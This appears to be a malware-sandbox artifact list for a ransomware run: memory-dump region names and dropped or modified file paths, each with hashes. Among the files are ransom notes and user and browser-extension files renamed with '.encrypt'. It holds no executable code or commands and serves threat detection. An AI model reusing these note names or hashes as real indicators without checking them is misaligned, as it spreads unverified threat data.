SHA512 8f20d19f92e5a14e4bc99ad7c16a0a5c2fed7a2964a61af240f1e8955f9d8b47207706f8a46575e202f550dd4bd7fd98e1f51f6e3948874d2525da91ac64eb4f

memory/5852-7194-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/5852-7195-0x0000000075390000-0x00000000755CA000-memory.dmp

memory/5852-11101-0x0000000076C70000-0x0000000076E0D000-memory.dmp

memory/5852-13110-0x0000000076E10000-0x0000000076E8D000-memory.dmp

C:\Users\Admin\Videos\HELP_DECRYPT_YOUR_FILES.txt

MD5 e44cd015c009e47aab9b1b11e1fc4936
SHA1 afec3d12392b51918c1c42b5aed1625dae007ac3
SHA256 8cfeb845d5738b90bcb227b6298dde6114f1cb0042f7c596f6a3d599a2621b95
SHA512 53e40588c2dd6b3d76752496ed74a55d173571e9794ffd88e78c291dcaa39d955e8046d9946478cec92c7ab41e12ea4a8cae589a61219b85986d4723c26e5522

C:\Users\Admin\Documents\Restore-My-Files.txt

MD5 b023ea7e46ed17e1b9cbad3a5f944db2
SHA1 700da850404b343d7873cb1ec60ad5afabcf5469
SHA256 c148c6f679d12a3b62ad158cf1406f8fa3ad69ba7463095985a7170aca288ec0
SHA512 2eca371570a99ff7d6788dd032f9fdff63104ab2dd0469129fc2cf2331e006225c847f0d598c6d52fc5de9f335c4c2e58aaf62e89d337fa17165720153e585e4

C:\Users\Admin\Contacts\HELP_DECRYPT_YOUR_FILES.txt

MD5 3cc2d08244a1ead086546c489687293b
SHA1 125f58a55ab503e5c3a5b356a9ccf7c172594f75
SHA256 987d8d5bbd17af1eb51e1b0907b1c823e79a135212a105ff06943d7406ed4561
SHA512 4f7f40aa4fae5d29c7c91c798e69b0a49f518d73011eaa5e2c72efc67e32a687cd921c5998f3acace6fdd3de2e4a2470d56ada55e67f24d6d35d4ccad619e3db

memory/5852-20385-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/5852-20325-0x0000000006590000-0x0000000006B36000-memory.dmp

memory/5852-20324-0x0000000005BF0000-0x0000000005C8C000-memory.dmp

memory/5852-20323-0x0000000000400000-0x00000000004CE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 be24f3fbf54e8b0bc9b453c5824064ea
SHA1 ac0d13430ff46da8436911866a3bf3a438c8a2aa
SHA256 d0dda3d7fbc525a867d6159c675fa5dec71483d5d8f37a5036687c9dbb3c3bb7
SHA512 1f1e47943b601ed725ea61c483e43a65091f53e3ceec704155a18e8ba2620b1abf5640c207e1ba107dbb2227cec95d5d6bd39940e2487413d84afe2d508c8a47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 f80c027c6d8a7f4036edf458eb40a0fb
SHA1 d1839fc3f9bcdf30c05fa9de2e54864a6ef0c760
SHA256 e370ef172127e47edea851c3899a3b5f531ff9a6d17a7007f7ea12e896b90f6c
SHA512 4647998067f3e803d70d18e6207101e354cd4582a138d3e252021c3d5d144516b7b46819e30176d84875f4a50196e56fd29fdc0ad753d3c2f0c8110aafdb1a3c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cce1bf5d00ac5b883be07fedaad8171d
SHA1 ec2379de11c0a07b43233c7bfa66cc9806c55385
SHA256 dce7621c71739a4697658050ca3f4c61ac20e0aee0de5dd5ea99c9df887802d5
SHA512 234e056daa11b82a6bbbdc4a9ecc8f0f904e03a4b8268364479a2e953745130e7f1511219b9269437c68070c29aae8c02bdd775b0811cd586043a215fdd4bbf1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 74fa4573dcb40ce3e6e14974294afdec
SHA1 c44827078607848896401ab40a8ff1d08c27c811
SHA256 cdab4112195a44f785d9fb4a85271a6a5fd7c62ec07b5885316583d963c5372c
SHA512 43d49ed1332ad81a91db072f72dab5a70bb4eca29e101a70939b558625fa025c3f3f58cb3ccdc8f5cbc1384d9185c2446db706705cd656d8f9331961783ae0e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 936336d3c2cdb01c335cf15df92065d2
SHA1 a4fe5e62d5e7648c3566c1647242ecf42e3cf1a7
SHA256 c3d04412d9fcc9c9b44525b93aef645ba29ab734ebbf030e6f451cf78fb29433
SHA512 0c0c74b647d494077ec42a8f3d27d5d60e18575cd2db9c4e5b6c1f6fd5e9725df8fd5757a5decd74365e97709de6a6ba512c690fcf5fbedd5597ac9f8185da22

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e0e91e14952f0d1547bd9b7b187330d1
SHA1 424f08a552899b3dd527647b6b39ab2b9b55d77b
SHA256 7b119599e7bc6cb3948288e512ecc013801b2c4656ab59ce3f56de452a7f8c99
SHA512 17c180a264f43fe59147771f6a86ec96f11334bc64e30065bce274af1593efc0af9ec68979fed41a5b2ffe6bace43544c8322b6658fe3595ee778cc794da9463

memory/14420-20610-0x000000001BE90000-0x000000001BED2000-memory.dmp

memory/14420-20613-0x000000001CA20000-0x000000001CAC6000-memory.dmp

memory/14420-20614-0x000000001CFA0000-0x000000001D46E000-memory.dmp

memory/14420-20615-0x000000001D580000-0x000000001D61C000-memory.dmp

memory/14420-20616-0x000000001BE40000-0x000000001BE48000-memory.dmp

memory/14420-20617-0x000000001D7E0000-0x000000001D82C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 8c6b49c21ae083572eaeecb02c0efee6
SHA1 a8a18d42bcba0875093c35410ebad66d0cf1db16
SHA256 8d0d391911f5a947c6134f0637a7706291b81d713f1f572961ff0965734181d4
SHA512 f1b55e0722b075d6b19144be55b9babcab06b67ece9c6d1fe367c15345bf249676d6023e13679b1bcd5df979bf1028d0329a49888eedd608bc7093f90684b812

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 34b61dde98276b1a374db59798b4fec7
SHA1 c8b0ed7a18ccc05494ff07e43362005cd35f4555
SHA256 5745a04cb8b6421629678a53fda2972125c6d7cb4cfdf808c971758aee5c195a
SHA512 f40e8120185010a11d5c0fac079f2000b1eb5bc4e565c508486cafa4796fd149fde18481ac59d997e9ab5578a5d92a4635ad2e426b5a1d208ba08a5edac71d57

memory/4200-20666-0x0000000002E20000-0x0000000002E21000-memory.dmp

memory/15308-20712-0x0000000000CD0000-0x0000000000CDC000-memory.dmp

memory/15308-20713-0x0000000005630000-0x000000000563A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 13998fcca120b6c5af5c251fdebd3e00
SHA1 aa0a8d9bb4dba4e285b3178f0fa253636f9fe88d
SHA256 b6fd013b3647341ccb162aec70e73c7c815a88b957a153374f2a73af28d74474
SHA512 a511d826c8208a364d1e4bff9a558cb70954add92fd104edcb9f8d2e67d8f98aac2b4a5f6a397cd4237c7fa7bde83d837cfad02c40eba45597c632355bfc1db6

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\UpdateLock-308046B0AF4A39CB.encrypt

MD5 da5a094000b37a4e04a465c6d6bbc293
SHA1 b4b879462fc2d90910afe5af37a933324c5f86a9
SHA256 4d66bafcea9fe79a33b3d91b6a4236618789539c9d7630b4b118a8e96e198701
SHA512 9446492ca0f55a9571794c2792f6dc18dee4857b282d1c0aac7569dbd56455b8d424cc801e2eb9245cfc93b228fad2dfcabc762a532e98f2a695d649b293f7eb

C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.encrypt

MD5 2c77adefdfbe014fb62ad974049e828f
SHA1 e48c2312c4295c844288ea6c402f9386cc51d11a
SHA256 989e46ef8aff059a4e973b4383e0e41d154247b2b1e25f2633f9633bdebe2d7a
SHA512 4df2888e33f80049324985b9f04fafd3e3be07cdc57ae77bd1ca33dfb5be3c7c68d2ec3a73139520439360fa59b069a4f2ca4e01e84e07feb2a4615be44434d6

C:\ProgramData\Package Cache\{9F51D16B-42E8-4A4A-8228-75045541A2AE}v56.64.8781\dotnet-host-7.0.16-win-x64.msi.encrypt

MD5 56deaccc2392ca238d60ecc3b0d27664
SHA1 6a1626d090dd8ca269b709da6610b9a5b8efbaba
SHA256 9771b44185ded8d4314162961987cf7ad35430e33f1e5e4d4ead580556835b96
SHA512 a31403259c5969ba05518c1a01c9cc3e0c8356f060912f5e39939789cb7809fd3cc87feea17300f3491244f6ebd151f6c4b0f4d6f8fe45ee3b736b3f2fc4f2d8

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.encrypt

MD5 407d7e7876d5be15bfeaf54f51e8c9cd
SHA1 b0c6a52e8df06e27db7c90c7c1fda5f155c1d337
SHA256 03ce645063d5ad0975947b0cbe1ba75ac1801ab8ff59c94ffa3375f82d19d50a
SHA512 3c37cdd7567aed4f5ba4a1f9b53ef3433c5e0a42e9eb981812d4af8cb56f6d57f6c8a5431dcab9d1dc7b1c73b78f6175855cd000dbe5cab864bf9c19749321db

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT.encrypt

MD5 f3237bbe4306bedad354bbf5e034422f
SHA1 e741ddd0f9bebc1f0f92156a29588b9ff5bcb22b
SHA256 197092afe4b83735abe4527dabcdb1611a8e6b3aab6c315192fa7d77aa588471
SHA512 df68c6780e88874c3ad0f99d4b3b907bec2ffb245079ac56161e3a6448cc4ca772d4a22506544eb6cd53560d9f612089895f2a70e4bfc96ea36e831f7c7b71c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001.encrypt

MD5 f1ac3ec81b83a43c30d0fd9e35244660
SHA1 c306d03a18837fe7fe77b2a8a8f6b0097f678b6d
SHA256 ab6aba16cdfe80c6bfd3ddca1c1f5bd3ebcae37b281d9334f7a2e972d88347c7
SHA512 9be08613a568f133022bf7d1f48fb0db3a2581f82bd6288d210fc2f14088bf2ba105695aa775a2a25650bff5dbeee30122578d5549f555fdba6bd095922af93d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index.encrypt

MD5 e9cd4ab7c97ea4c5ebc296eb9055e144
SHA1 3ad5a9b9358208b3df0d0a5a3d46cb516d19bdf7
SHA256 77c2858bc280859278e5f4b9d9900ecdc401875e7e1e09d444dc603aef758eff
SHA512 328e77fdb94cbd5a783cc751a05973f01ec87aba08fadc06deba7728f0e5ca3b5d214d6c8304f79a3899126c1a676e4d478691ce9fd408db8206769f2ce72947

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_0.encrypt

MD5 2c4fbecf0640659ddc7777d9257ebec2
SHA1 0c19240e9425f9c5063a764d0cba9b98af746426
SHA256 1218414192aa4deead487810dc61ae28faf482b675c75fd59a27dfdca46bd40c
SHA512 4e20ee85f88f49538ced3c368e93c1e26867c4f22891a1af2b9f6080911e69b8d0bebc77918b16f4c35d4ba310a2ae548bc0c738c44c7ee3659b4706ebe0c4ff

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_1.encrypt

MD5 10ed2063cf25b63857d7f135e7ee9711
SHA1 9b86e518fdd6cf3b6d7903fbce9471a19da9bc84
SHA256 f72c4b75fbc3f81c4a3b0051e34ffacd011e40c3180b2d5c937adc62669bdd2f
SHA512 8bc93d2de3cca4532a0360e99bc6877aae6126baedb88aa7cf43b14bb5065fcd276d419d5d779cf839e2819d0d1419d867faffbbc707d971ba6f6763993d88a2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_2.encrypt

MD5 c6be081dec773f94cc72e044da310ad8
SHA1 ed83425cc57ed4a4d5b4bafbe7f7f71dd4485348
SHA256 a728b5540892ca6abf4cf0fadf7c1f367881b49cdbbc537263dd5d99e2c66a1c
SHA512 f609f42c4a030533f0e8fe7896413a02ef8ae0575f63c39d2cbee9807a84e4b105116bb9debb6bc2b695cacb1186ad3002243abbd8b10d261c7ed7b2a60e7117

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_3.encrypt

MD5 0f07325043818b3c8dc717cce36ead70
SHA1 b8897c8b7467894eda1b693560890aa62ed9fbaf
SHA256 bb2e1fa07ece8650c688f5a1fd5208c94687329b8515776a6403d74e9695598a
SHA512 706b6d30695fab17c3d6adf314a1e3606b842bbfb67f7a8c1656ed4140086fe8c40c303aa82a014e2ffab1852d515508bacee0c2c5f4952a809d50ef16f00d6a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a1be40d935c28df4f69953e00c50ae6b
SHA1 d75f548b5b74dd26157f30f048b0f0fc5d8b0ad2
SHA256 06958a77ca74aa69d5c6d551912f41734cc47a27012ed51e587b4f5e885ea022
SHA512 f4abed47d60c633669421bcc1075ed8ffc6a97c416c99e95fc16da696d07dd8f13ffdefb4b2b7516599bdfeff7525b0d3773f371d9698d7e54378cd7582c8a49

memory/19832-22584-0x0000000000400000-0x000000000044E000-memory.dmp

memory/4200-22585-0x0000000000D80000-0x0000000000D81000-memory.dmp

memory/4200-22587-0x0000000000D90000-0x0000000000D91000-memory.dmp

memory/4200-22588-0x0000000002A50000-0x0000000002A51000-memory.dmp

memory/4200-22589-0x0000000002D60000-0x0000000002D61000-memory.dmp

memory/4200-22590-0x0000000002E60000-0x0000000002E61000-memory.dmp

memory/4200-22592-0x0000000002E30000-0x0000000002E31000-memory.dmp

memory/4200-22595-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

memory/4200-22598-0x00000000094E0000-0x00000000094E1000-memory.dmp

memory/4200-22599-0x000000000AFE0000-0x000000000AFE1000-memory.dmp

memory/4200-22600-0x000000000AFF0000-0x000000000AFF1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 dce42dc3cf39635e92fb9d1a7d6043bd
SHA1 623827ff2e96ada51c90fffa42726398ecb2d302
SHA256 71f2f591ba4ab3a0aa88f38ad62f6b30b34f4188bd3ce9d6c36d44ea59fa45db
SHA512 ca6a29a22152625d9dbd698fec12f4d46d169486919c611029d2677a6d9e2b1adb3b18878764e2ae43db9be5e89cc51f84e2a032449fa978f0506cca4b0d57c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RFe64da44.TMP

MD5 c2424c8465029cda8030f46f4915ab55
SHA1 77d60ce860c347e855219a5dc1ad053e9bfee30c
SHA256 e348e92a90285a30b932fc76314cebaa7f0c550795fd6377a5b74bdfab31f728
SHA512 77dd5b5f0a1d98eeb46fc7a928733403673429854afbb271c43d4c052cc75746ecb958e5602b0ebacb4d6c0a1255e34ce20fcab85d87172969a0fe786c98242e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 788b5f014c018d32adc107e78f2594d3
SHA1 eb60b4464fdf98c3a36a6244271ed4538f3ce37f
SHA256 a04883353eb93c21920f85278ec908db76888b99625d5b02dcad3fc3a3dc0b87
SHA512 cd8ecb26036e6c24c896195069d4a26658cdc21fd3f2229f74996180b0354b8e88d0c7b3d2eb693e96b8ac30881008354a76809bbe9ce5397e76530da015107c

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe

MD5 94b56d65a8b7f7253aeacac345d4b096
SHA1 7e11e248ae804d3647479a4fe5f03835a1eee4bc
SHA256 0f312587a999305794730da6f2198c82a346e64211e2fb054256102ac70315be
SHA512 538cc0c1b4dc66e8a3c6ca9a17ddac128441874248589bcc6c88b64ad7d3b93ff143867d6fad0002cbb4584e951d0e82441c350396e6d59b73207a3ffe0fc055

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133895710623192049.txt

MD5 e8c695bdb16bb8483342955cc99be60c
SHA1 1558643614dc903d2fd12197dc96b133e1075a4e
SHA256 0b666da3983130ddd5d37bca3345b90a5754318f0f722277c36860d7a15ec80a
SHA512 d3e34a77dc44f99a2af27763233eb90fddae49e378fda07db5a0293797a570bcb834b0cf568e7011c3bc9d49e6219b3a0563f3803e0c6923454d204c0fd1c732

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 9717dc76a8f27142ef21f89bc469c5f7
SHA1 4f76a8af1c06c4902cd50b6744f832c716ececa0
SHA256 a2fedb9a561751b101bd80fca318ea56990dc1d66be77302a2ed9ddb37867174
SHA512 d8e390d27316d7708e7921cae9e0c32acfd4f04cb46fa23555de5d694ea9de9ebf2b70ef89c822891f4ab00883dd76babc1c5d24b3a2eaa190548f8d4abb4e1e